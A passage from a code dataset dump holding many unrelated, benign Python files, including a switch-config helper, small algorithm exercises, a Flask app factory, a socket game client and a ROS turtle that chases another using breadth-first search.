np.linalg.norm(x - oldx) > tol:\n oldx = x\n x = W @ x + s @ (z_T @ x)\n iteration += 1\n if iteration >= max_iter:\n break\n x = x / sum(x)\n\n return x.reshape(-1)\n","sub_path":"build/lib/fast_pagerank/fast_pagerank.py","file_name":"fast_pagerank.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"631934377","text":"from 
mainapp.qip_dns_query import get_switch_ips\nimport base64\nfrom mainapp.show_ip_parser import parse_switch_ips\nfrom mainapp.gather_old_info import gather_old_switch_info\nfrom mainapp.show_command_parsers import parse_show_run_interface\nfrom mainapp.rename_interfaces import rename_vlan_port_list, rename_interface\nfrom mainapp.qip_dns_query import get_switch_ips\nfrom datetime import date\nimport re\nimport pdb\n\nhostname = \"\"\nCLOSET = \"\"\nONHILL = \"\"\nBUILDENGINEER = \"\"\nBUILDDATE = \"\"\nMEMBERS = \"\"\nLOOPBACK = \"\"\n\nAGG_INT_NAME = \"\"\n\nV100_VRRP = \"\"\nV100_GW = \"\"\nV300_VRRP = \"\"\nV200_GW = \"\"\nV555_VRRP = \"\"\nV555_GW = \"\"\nV701_VRRP = \"\"\nV701_GW = \"\"\nV702_VRRP = \"\"\nV702_GW = \"\"\nV703_VRRP = \"\"\nV703_GW = \"\"\nVLAN_INDEX = \"\"\nUPLINK_1_IP = \"\"\nUPLINK_2_IP = \"\"\nINTER_REG = \"\"\n\nLICENSE_KEY_1 = \"\"\nLICENSE_KEY_2 = \"\"\nDATE = date.today().strftime('%m\\%d\\%Y')\n\ndef rename_cisco_to_junos(cisco_switch):\n juniper_interfaces = dict()\n for k,v in cisco_switch['interfaces'].items():\n j = rename_interface(k)\n juniper_interfaces[j] = {'vlan': '', 'voice': ''}\n if k in cisco_switch['descriptions'].keys():\n juniper_interfaces[j]['description'] = cisco_switch['descriptions'][k]\n if v:\n if 'voice' in v and 'vlan' in v:\n juniper_interfaces[j]['vlan'] = cisco_switch['vlans'][v['vlan']]['name'].upper()\n juniper_interfaces[j]['voice'] = cisco_switch['vlans'][v['voice']]['name'].upper()\n elif 'vlan' in v:\n juniper_interfaces[j]['vlan'] = cisco_switch['vlans'][v['vlan']]['name'].upper()\n juniper_interfaces[j]['voice'] = None\n return juniper_interfaces\n\ndef create_template(old_switch_info, dns_records):\n new_switch = dict()\n new_switch['loopback'] = find_new_loopback(old_switch_info['hostname'], dns_records)\n new_switch['interregion'] = find_interregion(old_switch_info['hostname'], dns_records)\n new_switch['nameserver'] = old_switch_info['nameserver']\n new_switch['members'] = old_switch_info['members']\n new_switch['vlans'] = old_switch_info['vlans']\n new_switch['hostname'] = old_switch_info['hostname']\n new_switch['location'] = old_switch_info['location']\n new_switch['vlan_index'] = old_switch_info['vlan_index']\n if new_switch['members'] > 1:\n new_switch['mgmt_range_end'] = 1\n else:\n new_switch['mgmt_range_end'] = 0\n new_switch['vlan_ips'] = old_switch_info['ips']['vlan_ips']\n new_switch['vrrp'] = find_vrrp_addresses(old_switch_info['vlans'], old_switch_info['ips']['vlan_ips'], dns_records)\n return new_switch\n \ndef find_new_loopback(hostname, dns_records):\n for item in dns_records:\n if item['name'].lower() == '{}-new.ohsu.edu'.format(hostname.lower()):\n return item['address']\n\ndef find_interregion(hostname, dns_records):\n for item in dns_records:\n if 'irb' in item['name'].lower() and '2399' in item['name'].lower():\n return item['address']\n\ndef find_vrrp_addresses(vlans, vlan_ips, dns_records):\n vrrp = dict()\n vlan_re = re.compile('.*(?:vlan|vl)(\\d{2,4}).*(?:vrrp|hsrp)?.*')\n vrrp_re = re.compile('.*-old-(?:vlan|vl)(\\d{2,4}).*(?:vrrp|hsrp)?.*')\n for item in dns_records:\n is_vlan = re.match('.*(vlan|vl)(\\d{2,4}).*\\..*',item['name'].lower())\n is_vrrp = re.match('.*-old-(vlan|vl)(\\d{2,4}).*(vrrp|hsrp).*',item['name'].lower())\n if is_vlan:\n # check if vrrp and hsrp in name, check on better logic later\n if 'vrrp' in item['name'].lower() or 'hsrp' in item['name'].lower():\n pass\n elif is_vlan.group(2) in vlans.keys():\n subnet = vlan_ips[is_vlan.group(2)][1]\n vrrp[is_vlan.group(2)] = {'ip': 
'', 'vrrp': ''}\n vrrp[is_vlan.group(2)]['ip'] = \"{}/{}\".format(item['address'],subnet)\n if is_vrrp:\n if is_vrrp.group(2) in vlans.keys():\n subnet = vlan_ips[is_vrrp.group(2)][1]\n vrrp[is_vrrp.group(2)]['vrrp'] = \"{}/{}\".format(item['address'],subnet)\n return vrrp\n\ndef extract_vrrp_address(dnsrecord):\n is_vrrp = re.match('.*-old-(vlan|vl)(\\d{2,4}).*(vrrp|hsrp).*', dnsrecord.lower())\n\n","sub_path":"network-robot/mainapp/make_config.py","file_name":"make_config.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"17642162","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 2 17:39:07 2017\n\n@author: blindness\n\nconvert decimal to hexadecimal \n\"\"\"\n\ndef to_string(n, base):\n convert_string = \"0123456789ABCDEF\"\n if(n < base):\n return convert_string[n]\n else:\n return to_string(n//base,base) + convert_string[n % base]\n \nprint(to_string(2835,16)) ","sub_path":"dec_to_hex.py","file_name":"dec_to_hex.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"462112264","text":"import tkinter as tk\nfrom PIL import ImageTk\n\nfrom controller import images as controller\nfrom controller import pieces as pieces_controller\n\n\nclass ImageList(tk.LabelFrame):\n def _repack(self):\n for k, v in self.but_ids.items():\n self.images_list.delete(v)\n\n i = 1\n for k, but in self.image_buts.items():\n self.images_list.create_window(i*120, 100, window=but, width=120, height=120)\n i += 1\n\n self.images_list.configure(scrollregion=self.images_list.bbox('all'), xscrollcommand=self.scrollbar.set)\n\n def __init__(self, master):\n tk.LabelFrame.__init__(self, master, text='Images', height=250)\n\n self.button_frame = tk.Frame(self)\n self.add_but = tk.Button(self.button_frame, text='Add to Frame', command=pieces_controller.add_from_image)\n self.import_but = tk.Button(\n self.button_frame, text='Import', command=controller.import_image, background='#ff5555'\n )\n self.import_sp_but = tk.Button(\n self.button_frame, text='Import Spritesheet', command=controller.import_spritesheet_open, background='#22ff22'\n )\n self.delete_but = tk.Button(self.button_frame, text='Delete', command=controller.delete_image)\n self.vert_but = tk.Button(self.button_frame, text='Clone via Vertical Flip', command=controller.clone_vertical)\n self.hori_but = tk.Button(\n self.button_frame, text='Clone via Horizontal Flip', command=controller.clone_horizontal\n )\n self.add_but.grid(row=0, column=0, pady=5, padx=3)\n self.import_but.grid(row=0, column=1, pady=5, padx=3)\n self.import_sp_but.grid(row=0, column=2, pady=5, padx=3)\n self.delete_but.grid(row=0, column=3, pady=5, padx=3)\n self.vert_but.grid(row=0, column=4, pady=5, padx=3)\n self.hori_but.grid(row=0, column=5, pady=5, padx=3)\n self.button_frame.pack(side='top')\n\n self.list_frame = tk.Frame(self)\n self.images_list = tk.Canvas(self.list_frame)\n self.scrollbar = tk.Scrollbar(self.list_frame, orient='horizontal', command=self.images_list.xview)\n\n self.selected_image = tk.IntVar()\n self.tk_images = {} # image_id -> PhotoImage\n self.image_buts = {} # image_id -> RadioButton\n self.but_ids = {} # image_id -> canvas id\n\n self.images_list.pack(fill='both', expand=True, side='top')\n self.scrollbar.pack(fill='both', expand=True, side='bottom')\n self.list_frame.pack(fill='both', expand=True, side='bottom')\n\n self.grid(row=1, column=0, 
sticky=tk.W+tk.E)\n\n def get_selected_image(self):\n return self.selected_image.get()\n\n def add_image(self, image_id, img):\n self.tk_images[image_id] = ImageTk.PhotoImage(img.resize((100, 100)))\n img = self.tk_images[image_id]\n self.image_buts[image_id] = tk.Radiobutton(self, image=img, value=image_id, variable=self.selected_image)\n self.but_ids[image_id] = self.images_list.create_window(\n len(self.image_buts)*120,\n 100,\n window=self.image_buts[image_id],\n width=120,\n height=120\n )\n self.images_list.configure(scrollregion=self.images_list.bbox('all'), xscrollcommand=self.scrollbar.set)\n\n def remove_image(self, image_id):\n canvas_id = self.but_ids[image_id]\n self.images_list.delete(canvas_id)\n del self.but_ids[image_id]\n del self.image_buts[image_id]\n del self.tk_images[image_id]\n self._repack()\n\n def clear(self):\n for k, v in self.but_ids.items():\n self.images_list.delete(v)\n self.but_ids = {}\n self.tk_images = {}\n self.image_buts = {}\n","sub_path":"view/images_list.py","file_name":"images_list.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"491733","text":"# Author: Kartik Sah\n# Year: 2018\n# Topic: Decorators\n# Decorators are a way to dynamically alter the functionality of your functions.\n\ndef decorator_func(use_func):\n import logging\n import time\n\n logging.basicConfig(filename='{}.log'.format(use_func.__name__), level = logging.INFO)\n\n def wrapper_func(*args,**kwargs):\n time_start = time.time()\n result = use_func(*args, **kwargs)\n for i in range(100000):\n a = 0\n time_end = time.time()\n delta_time = time_end - time_start\n logging.info('Ran with args: {} and kwargs: {}, time taken to complete: {:.2f} seconds'.format(args,kwargs,delta_time))\n return result\n\n\n return wrapper_func\n\n@decorator_func\ndef check_func(name):\n return 'My name is ' + name\n\n# check_func = decorator_func(check_func) -- is equivalent to @decorator_func\n# check_func() now calls the wrapper_func, which takes 'Kartik' as an argument\n\nprint(check_func('Kartik'))\n","sub_path":"Decorators/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"134705600","text":"#! ../env/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Benjamin Apra'\n__email__ = 'bapra@twistbioscience.com'\n__version__ = '1.0'\n\nfrom flask import Flask\nfrom webassets.loaders import PythonLoader as PythonAssetsLoader\nfrom flask_restful import Api\nfrom tasks import *\n\nfrom bioseqscreen.controllers.main import main\nfrom bioseqscreen import assets\nfrom bioseqscreen.models import db\nfrom bioseqscreen.extensions import (\n admin,\n cache,\n assets_env,\n debug_toolbar,\n login_manager\n)\nfrom bioseqscreen.rest import add_routes\n\nimport sys, os\nsys.path.append(os.path.abspath(\"../..\"))\n\ndef create_app(object_name):\n \"\"\"\n An flask application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n Arguments:\n object_name: the python path of the config object,\n e.g. bioseqscreen.settings.ProdConfig\n\n env: The name of the current environment, e.g. 
prod or dev\n \"\"\"\n\n app = Flask(__name__)\n\n app.config.from_object(object_name)\n\n # initialize the cache\n cache.init_app(app)\n\n # initialize the debug tool bar\n debug_toolbar.init_app(app)\n\n # initialize SQLAlchemy\n db.init_app(app)\n if not os.path.exists(os.path.join(os.getcwd(), 'database.sqlite')):\n with app.app_context():\n db.create_all()\n\n login_manager.init_app(app)\n\n # Import and register the different asset bundles\n assets_env.init_app(app)\n assets_loader = PythonAssetsLoader(assets)\n for name, bundle in assets_loader.load_bundles().items():\n assets_env.register(name, bundle)\n\n # register our blueprints\n app.register_blueprint(main)\n\n admin.init_app(app)\n\n api = Api(app)\n add_routes(api)\n\n return app\n\nenv = os.environ.get('BIOSEQSCREEN_ENV', 'dev')\napp = create_app('bioseqscreen.settings.%sConfig' % env.capitalize())\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"499948755","text":"class Solution:\n # @param n: an integer\n # @return an integer f(n)\n def fibonacci(self, n):\n # write your code here\n fib=[0]*n\n \n if n==1:\n fib[0]=0\n elif n==2:\n fib[1]=1\n else:\n fib[0],fib[1]=0,1\n for i in range(2,n):\n fib[i]=fib[i-1]+fib[i-2]\n \n return fib[n-1]\n","sub_path":"Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"642019582","text":"a = int(input())\nb = int(input())\n\ns = 0\nm = 999999\nfor i in range(1, 101):\n if i**2 >= a and i**2 <= b:\n s += i**2\n if m > i**2: m = i**2\n\nif s > 0:\n print(s)\n print(m)\nelse:\n print(-1)\n","sub_path":"01000/01977/1977.py3.py","file_name":"1977.py3.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"95099369","text":"import re\n\nclass Point:\n def __init__(self, x, y, dx, dy):\n self.x = x\n self.y = y\n self.dx = dx\n self.dy = dy\n def update(self):\n self.x += self.dx\n self.y += self.dy\n def __str__(self):\n return str(self.x)+','+str(self.y)+';'+str(self.dx)+','+str(self.dy)\n\ndef read_points():\n with open('../input/day10.txt') as f:\n lines = f.readlines()\n prog = re.compile(r'position=<(\\s*\\-?\\d+),(\\s*\\-?\\d+)> velocity=<(\\s*\\-?\\d+),(\\s*\\-?\\d+)>')\n points = []\n for line in lines:\n match = prog.search(line)\n groups = match.groups()\n points.append(Point(int(groups[0]), int(groups[1]), int(groups[2]), int(groups[3])))\n return points\n\ndef print_points(points):\n min_x = float('inf')\n max_x = float('-inf')\n min_y = float('inf')\n max_y = float('-inf')\n for p in points:\n if p.x < min_x:\n min_x = p.x\n if p.x > max_x:\n max_x = p.x\n if p.y < min_y:\n min_y = p.y\n if p.y > max_y:\n max_y = p.y\n if max_y - min_y > 10:\n return [['.']]\n center_x = -1 * min_x\n center_y = -1 * min_y\n matrix = [['.' 
for i in range(min_x, max_x+1)] for j in range(min_y, max_y+1)]\n for p in points:\n i = center_x + p.x\n j = center_y + p.y\n matrix[j][i] = '#'\n return matrix\n\npoints = read_points()\nsecond_count = 500000\nf = open('results.txt','w')\nfor i in range(second_count):\n matrix = print_points(points)\n if len(matrix) > 1:\n f.write('After '+str(i)+' seconds\\n')\n for r in matrix:\n f.write(''.join(r)+'\\n')\n for p in points:\n p.update()\nf.close()","sub_path":"day10/day10-1.py","file_name":"day10-1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"351585117","text":"import requests\nimport json\n\nURL = \"http://127.0.0.1:8000/\"\n\n\ndef readData(id=None):\n data = {}\n if id is not None:\n data = {'id': id}\n json_data = json.dumps(data)\n res = requests.get(url=URL, data=json_data)\n print(res.json())\n\n\n# readData(2)\n\ndef createData():\n data = {\n 'name': 'Ajay Kabira',\n 'roll': 344,\n 'section': 'Business',\n 'age': 37\n }\n json_data = json.dumps(data)\n res = requests.post(url=URL, data=json_data)\n print(res.json())\n\n\n# createData()\n\ndef partialUpdate():\n data = {\n 'id': 3,\n 'name': 'Kamal Kumar',\n 'age': 40\n }\n json_data = json.dumps(data)\n res = requests.put(url=URL, data=json_data)\n print(res.json())\n\n\n# partialUpdate()\n\ndef deleteData(id):\n data = {'id': id}\n json_data = json.dumps(data)\n res = requests.delete(url=URL, data=json_data)\n print(res.json())\n\n\ndeleteData(3)\n","sub_path":"3_DjangoCRUDAPIFunctionBased/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"570359351","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFile: heap_sort_big_files.py\nAuthor: Hong-Wei Ng\nEmail: lightalchemist@gmail.com\nGithub: https://github.com/lightalchemist\nDescription: Qn 10.1 on pg 80 from Elements of Programming Interviews.\n\nGiven a number of files which contain lines of the form , ...\neach sorted by timestamps,\ncombine the contents of all these files into a file sorted by the timestamps.\n\nThe individual files are of the order 5-100 MB and there may be many files.\nDesign an algorithm to perform the task that use very little RAM, ideally of\nthe order of a few KB.\n\n\"\"\"\n\nfrom heapq import heapify\nfrom heapq import heappush\nfrom heapq import heappop\n\n\ndef insert_line(heap, infile, fid):\n line = infile.readline()\n if line:\n timestamp = int(line.split(',')[0])\n heappush(heap, (timestamp, line, fid))\n\n\ndef sort(filenames, outfilename):\n with open(outfilename, 'w') as outfile:\n heap = []\n infiles = [open(f) for f in filenames]\n # Populate heap\n for i, infile in enumerate(infiles):\n insert_line(heap, infile, i)\n\n heapify(heap)\n\n while heap:\n timestamp, line, fid = heappop(heap)\n outfile.write(line)\n insert_line(heap, infiles[fid], fid) # Replace line from file with another line from same file\n\n # Close all files\n for infile in infiles:\n infile.close()\n\n\ndef test():\n filenames = [\"file1.txt\", \"file2.txt\", \"file3.txt\"]\n outfilename = \"sorted_lines.txt\"\n sort(filenames, outfilename)\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"algorithms/general/heap_sort_big_files.py","file_name":"heap_sort_big_files.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} 
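The heap_sort_big_files.py record above builds the k-way merge by hand with heapq.heappush/heappop. Since Python 3.5 the standard library's heapq.merge expresses the same lazy merge directly; the sketch below is a minimal alternative under the same assumptions (inputs already sorted, each line beginning with an integer timestamp followed by a comma). merge_logs and the merged.txt output name are illustrative placeholders, not part of the original record.

    # K-way merge of timestamp-sorted log files via heapq.merge (a sketch).
    # Assumes each input line looks like "<timestamp>,...", as in insert_line().
    import contextlib
    from heapq import merge

    def merge_logs(filenames, outfilename):
        with contextlib.ExitStack() as stack:
            outfile = stack.enter_context(open(outfilename, 'w'))
            infiles = [stack.enter_context(open(f)) for f in filenames]
            # heapq.merge consumes the sorted inputs lazily, so memory use grows
            # with the number of files, not with their combined size.
            for line in merge(*infiles, key=lambda line: int(line.split(',')[0])):
                outfile.write(line)

    if __name__ == '__main__':
        merge_logs(['file1.txt', 'file2.txt', 'file3.txt'], 'merged.txt')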
+{"seq_id":"541292972","text":"\"\"\"\n1. Задание на закрепление знаний по модулю CSV. Написать скрипт,\nосуществляющий выборку определенных данных из файлов info_1.txt, info_2.txt,\ninfo_3.txt и формирующий новый «отчетный» файл в формате CSV.\n\nДля этого:\n\nСоздать функцию get_data(), в которой в цикле осуществляется перебор файлов\nс данными, их открытие и считывание данных. В этой функции из считанных данных\nнеобходимо с помощью регулярных выражений извлечь значения параметров\n«Изготовитель системы», «Название ОС», «Код продукта», «Тип системы».\nЗначения каждого параметра поместить в соответствующий список. Должно\nполучиться четыре списка — например, os_prod_list, os_name_list,\nos_code_list, os_type_list. В этой же функции создать главный список\nдля хранения данных отчета — например, main_data — и поместить в него\nназвания столбцов отчета в виде списка: «Изготовитель системы»,\n«Название ОС», «Код продукта», «Тип системы». Значения для этих\nстолбцов также оформить в виде списка и поместить в файл main_data\n(также для каждого файла);\n\nСоздать функцию write_to_csv(), в которую передавать ссылку на CSV-файл.\nВ этой функции реализовать получение данных через вызов функции get_data(),\nа также сохранение подготовленных данных в соответствующий CSV-файл;\n\nПример того, что должно получиться:\n\nИзготовитель системы,Название ОС,Код продукта,Тип системы\n\n1,LENOVO,Windows 7,00971-OEM-1982661-00231,x64-based\n\n2,ACER,Windows 10,00971-OEM-1982661-00231,x64-based\n\n3,DELL,Windows 8.1,00971-OEM-1982661-00231,x86-based\n\nОбязательно проверьте, что у вас получается примерно то же самое.\n\nПРОШУ ВАС НЕ УДАЛЯТЬ СЛУЖЕБНЫЕ ФАЙЛЫ TXT И ИТОГОВЫЙ ФАЙЛ CSV!!!\n\"\"\"\nimport csv\nimport re\n# import chardet\n\nHEADER = [\"Изготовитель системы\", \"Название ОС\", \"Код продукта\", \"Тип системы\"]\nFILES = ['info_1.txt', 'info_2.txt', 'info_3.txt']\n\n\ndef task_1():\n \"\"\"function creating dict for write and get data\"\"\"\n os_prod_list = list()\n os_name_list = list()\n os_code_list = list()\n os_type_list = list()\n main_data = [HEADER]\n looking_for = [r'Изготовитель системы:\\s', r'Название ОС:\\s',\n r'Код продукта:\\s', r'Тип системы:\\s']\n for file in FILES:\n with open(file, 'rb') as tmp_f:\n for line in tmp_f.readlines():\n # с поиском кодировки не заполняется файл\n # encoding = chardet.detect(line)\n # print(encoding)\n # line = bytes.decode(line, encoding=encoding['encoding']).\\\n # encode('utf-8').decode('utf-8')\n # при тестировании не забыть импортировать chardet\n line = bytes.decode(line, encoding='cp1251'). 
\\\n encode('utf-8').decode('utf-8')\n for counter, reg_ex in enumerate(looking_for):\n found_string = re.search(reg_ex, line)\n if found_string is not None and counter == 0:\n found_string = re.split(r'\\W{2,}', line)\n os_prod_list.append(found_string[1])\n if found_string is not None and counter == 1:\n found_string = re.split(r'\\W{2,}', line)\n os_name_list.append(found_string[1])\n if found_string is not None and counter == 2:\n found_string = re.split(r'\\W{2,}', line)\n os_code_list.append(found_string[1])\n if found_string is not None and counter == 3:\n found_string = re.split(r'\\W{2,}', line)\n os_type_list.append(found_string[1])\n for counter in range(len(os_prod_list)):\n tmp_list = [os_prod_list[counter], os_name_list[counter],\n os_code_list[counter], os_type_list[counter]]\n main_data.append(tmp_list)\n return main_data\n\n\ndef task_1_launcher(file_obj):\n \"\"\"Function to save dict in file csv format\"\"\"\n with open(file_obj, 'w', encoding='utf-8') as f_writer:\n f_writer = csv.writer(f_writer, quoting=csv.QUOTE_ALL)\n for row in task_1():\n f_writer.writerow(row)\n\n\ntask_1_launcher('main_data.csv')\nprint('Программа выполнена')\n","sub_path":"lesson_2/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"151783430","text":"import socket\nimport json\nfrom time import time\nfrom colorama import init\nfrom termcolor import colored\nimport os\n\ninit(autoreset=True)\n\n# Creando un socket TCP/IP\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# Conecta el socket en el puerto cuando el servidor esté escuchando\nserver_address = ('localhost', 3000)\nprint('conectando a %s puerto %s' % server_address)\nsock.connect(server_address)\n\ndef verify_cordinates(coordenada, solucion):\n cordinate = []\n for x in coordenada:\n if x.isdigit():\n cordinate.append(int(x))\n else:\n return '', False\n for key in solucion:\n if cordinate == solucion[key]:\n return key, True\n return '', False\n\ntry:\n os.system(\"cls\")\n # Enviando datos\n message = b' '\n sock.sendall(message)\n # Buscando respuesta\n while True:\n # Recibimos los datos para jugar\n topic = sock.recv(128)\n tablero = sock.recv(2048).decode()\n solve = json.loads(sock.recv(1024).decode())\n # definimos la listas de solucion\n words = []\n words_finder = []\n for key in solve:\n words.append(key)\n\n # jugamos hasta que no queden palabras en cola\n time_s = time()\n while words:\n os.system(\"cls\")\n # imprimimos el topico de la sopa de letras\n print('\\n\\t TOPICO >>> ', colored(topic.decode(\"utf-8\").upper(), 'green'), '\\n')\n # dibujamos el tablero recibido\n print(tablero)\n # mostramos palabras a encontrar\n print('PODRAS ENCONTRAR ESTAS PALABRAS CRACK?...')\n for i in words:\n print(colored(i, 'blue'), end=' ')\n # mostramos las palabras que hemos encontrado\n print('\\n\\nPALABRAS ENCONTRADAS CRACK...')\n if not words_finder:\n print(colored('Nada aun capo, piensa esponja, piensa...', 'cyan'), end='\\t')\n else:\n for i in words_finder:\n print(colored(i, 'cyan'), end=' ')\n # preguntas por las coordenadas\n print('\\n\\nintroduce las cordenadas de la primera y ultima letra de la palabra, por espacios')\n print('ejemplo : 1 2 3 4')\n word_try = list(input('algunas cordenadas crack? 
>>> ').split())\n # comprobamos si las cordenadas son validas\n llave, resultado = verify_cordinates(word_try, solve)\n if resultado:\n words_finder.append(llave)\n words.remove(llave)\n else:\n pause = input(colored('\\nUy no capo, si ves bien o te presto mis lestes?...', 'red'))\n\n # cuando el juego finalize enviamos el tiempo que le tomo al jugador\n time_f = time()\n sock.sendall(bytes(str(time_f-time_s), encoding='utf-8'))\n\n print(colored('\\n\\nGRANDEEE!!! TU NOMBRE SERA RECORDADO POR LAS GENERACIONES!...', 'red'))\nexcept:\n print('')\n\nfinally:\n print('cerrando socket...')\n sock.close()","sub_path":"practica_2_/sdl_clt.py","file_name":"sdl_clt.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"86384734","text":"a = [\"banana\", \"apple\",\"microsoft\"]\n\nfor element in a :\n\tprint(element)\n\n\nb = [1,3,4,5,6,6,7,7,8]\ntotal = 0\nfor e in b:\n\tprint(e)\n\ttotal = total + e\n\tprint(total)\n\n#range(1, 5)\nc = list(range(1, 5))\nprint(c)\n\ntotal2 = 0\nfor d in range(1, 5):\n\ttotal2 += d\n\tprint(total2)\n\nprint(list(range(1, 8)))\ntotal3 = 0\nfor i in range(1, 8):\n\tif i % 3 == 0 :\n\t\ttotal3 += i\n\t\tprint(total3)\n\n\n","sub_path":"loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"128844361","text":"#!/usr/bin/env python3\n\nimport rospy\nimport math\nfrom gazebo_msgs.msg import ModelState, ModelStates\nfrom geometry_msgs.msg import Point, Pose, Quaternion, Twist, Vector3\nfrom q_learning_project.msg import QLearningReward\nfrom std_msgs.msg import Header\nfrom numpy import genfromtxt\nfrom queue import Queue\n\nfrom random import shuffle\nfrom tf.transformations import quaternion_from_euler, euler_from_quaternion\n\nRED = \"redghost\"\nPACTURTLE = \"pacturtle\"\nMAP_WIDTH = 9\nMAP_HEIGHT = 11\nPAC_CELL = 0\nRED_CELL = 0\n\nclass RedTurtle(object):\n def __init__(self):\n\n # initialize this node\n rospy.init_node('final_project_red_turtle')\n\n # initial prep for BFS algorithm\n self.unpack_adjMatrix()\n self.create_adjLists()\n self.init_bfs_entities()\n\n # save initial positions\n self.init_pos = {}\n self.init_pos[PACTURTLE] = Point(x=2, y=5, z=0)\n self.init_pos[RED] = Point(x=0.5, y=0.5, z=0)\n\n self.PAC_CELL = 0\n self.RED_CELL = 0\n # Initially stationary (not moving forward)\n self.forward = False\n\n # Subscribe to model states\n rospy.Subscriber(\"/gazebo/model_states\", ModelStates,\n self.turtle_hunter)\n\n # Command Vel pub\n self.command_pub = rospy.Publisher(\"/redghost/cmd_vel\", Twist, queue_size=10)\n\n rospy.sleep(1)\n\n self.run()\n\n # Unpack the adjaceny matrix text file into an array\n # Note the generated matrix has one too many values -- the newline\n # char is treated as a -1. 
Will ignore this when working with adj matrix\n # (we do not use negative values in our matrix)\n def unpack_adjMatrix(self):\n self.matrix = genfromtxt(\"../map/Pacturtle_v2/map.txt\", dtype=int, comments=\"#\",\n delimiter=\",\", autostrip = True, unpack=False)\n\n # Uses unpacked adjaceny matrix to create a list of adjancent cells for each cell.\n # Packaged into a single dictionary\n def create_adjLists(self):\n self.adjLists = {}\n for node in range(0, 99):\n adjacent = []\n for pos_adj in range(0, 99):\n # Checks adjacent matrix to see if pos_adj is a valid adjancent cell\n if self.matrix[node][pos_adj] == 1:\n adjacent.append(pos_adj)\n self.adjLists[node] = adjacent\n\n # Helper function from previous project\n def get_yaw_from_pose(self, p):\n \"\"\" A helper function that takes in a Pose object (geometry_msgs) and returns yaw\"\"\"\n\n yaw = (euler_from_quaternion([\n p.orientation.x,\n p.orientation.y,\n p.orientation.z,\n p.orientation.w])\n [2])\n\n return yaw\n\n # BFS implementation, Source: PyVision Youtube Video\n def init_bfs_entities(self):\n self.parentList = {}\n for source in range(0, 99):\n # Create and initialize required vars to \"empty\" position\n visited = {}\n dist = {}\n parent = {}\n traversal = []\n queue = Queue()\n for node in self.adjLists.keys():\n visited[node] = False\n parent[node] = None\n dist[node] = -1\n\n # Begin BFS\n visited[source] = True\n dist[source] = 0\n queue.put(source)\n\n while not queue.empty():\n u = queue.get()\n traversal.append(u)\n\n for v in self.adjLists[u]:\n if not visited[v]:\n visited[v] = True\n parent[v] = u\n dist[v] = dist[u] + 1\n queue.put(v)\n self.parentList[source] = parent\n\n # BFS is complete at this point\n # Use BFS entities to determine shortest path\n def shortest_path(self, source, end):\n path = []\n parent = self.parentList[source]\n while end is not None:\n path.append(end)\n end = parent[end]\n path.reverse()\n self.shortestPath = path\n\n # Executes linear and angular movements\n def move(self):\n # Find the next cell to traverse to\n # Required step since, depending on exact coordinates, shortestPath\n # may or many not include cell the bot is currently in (if it does, need to\n # ignore current cell and take the next one)\n target_cell = 0\n for next_cell in self.shortestPath:\n if self.RED_CELL != next_cell:\n target_cell = next_cell\n break\n # Determine direction of target cell relative to current cell\n # Below 2 are conditions for moving along the x axis\n # If target cell is to the left:\n if target_cell == self.RED_CELL - 1:\n target_yaw = 3.1415\n # If target cell is to the right:\n elif target_cell == self.RED_CELL + 1:\n target_yaw = 0\n # Below 2 are conditions of moving along the y axis\n # If target cell is to the top:\n elif target_cell == self.RED_CELL + MAP_WIDTH:\n target_yaw = 1.5708\n # If target cell is to the bottom:\n else:\n target_yaw = -1.5708\n\n yaw_error = 0.1\n current_yaw = self.get_yaw_from_pose(self.POSE)\n # Check for edge cases when yaw goes from positive to negative (ie. around 0,\n # transition from 3.14 to -3.14). 
